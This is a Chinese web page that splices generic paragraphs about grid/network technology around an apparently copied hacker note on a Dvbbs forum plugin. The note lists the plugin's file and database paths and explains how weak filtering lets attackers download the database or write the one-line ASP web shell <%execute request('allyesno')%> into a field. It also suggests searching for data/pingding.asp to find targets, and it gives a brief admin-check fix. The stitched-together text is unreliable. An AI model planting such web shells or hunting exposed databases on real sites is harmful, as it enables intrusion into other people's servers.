网络技术是从1990年代中期发展起来的新技术,它把互联网上分散的资源融为有机整体,实现资源的全面共享和有机协作,使人们能够透明地使用资源的整体能力并按需获取信息。资源包括高性能计算机、存储资源、数据资源、信息资源、知识资源、专家资源、大型数据库、网络、传感器等。 当前的互联网只限于信息共享,网络则被认为是互联网发展的第三阶段。 就是关于“斑主评定”栏目,当然是插件。插件比较乱,有很多,比如前台就是 z_disadmin.asp z_disadmin_edit.asp z_disadminconn.asp 后台在data/#pingding.mdb 有的后台在data/pingding.asp 有的则在data/disadmin_db.asp 另外有的后台会这样Data_plus/something的! 当然可以暴库,关键就是z_disadminconn.asp过滤不严,但是必须要找到它的所在,而且要二级。 利用的方法: -------------------------------- 关于mdb作数据库的,那当然没什么危险,这个漏洞也只能算是个鸡肋。 但是对于asp作数据库的,却有利用的方法。 这都是因为edit中一个update的错误,大部分字段都是整型的,因为数据库的规定 而有一个字段是可以写入木马的。 虽然长度有限制,但是够写一个微型木马了,我用<%execute request("allyesno")%> 对于暂时的防范,可以在edit中加入一个过滤参数: -----------codz begin---------------- Head() dim admin_flag,isEdit,boname,msgtitle,msginfo,SubRs admin_flag="22" if not Dvbbs.master or instr(session("flag"),admin_flag)=0 then Errmsg=ErrMsg + "<BR><li>本页面为管理员专用,请<a href=admin_index.asp target=_top> 登陆</a>后进入。<br><li>您没有管理本页面的权限。" dvbbs_error() end if -------------codz end--------------- 总而言之,只能说明开发插件的人头脑有问题。 虽然利用不大,扩散不广。但是还是有得玩的! 具体攻击: 应该是搜索data/pingding.asp。一般这个数据库没人改的 网络的神奇作用吸引着越来越多的用户加入其中,正因如此,网络的承受能力也面临着越来越严峻的考验―从硬件上、软件上、所用标准上......,各项技术都需要适时应势,对应发展,这正是网络迅速走向进步的催化剂。 |
温馨提示:喜欢本站的话,请收藏一下本站!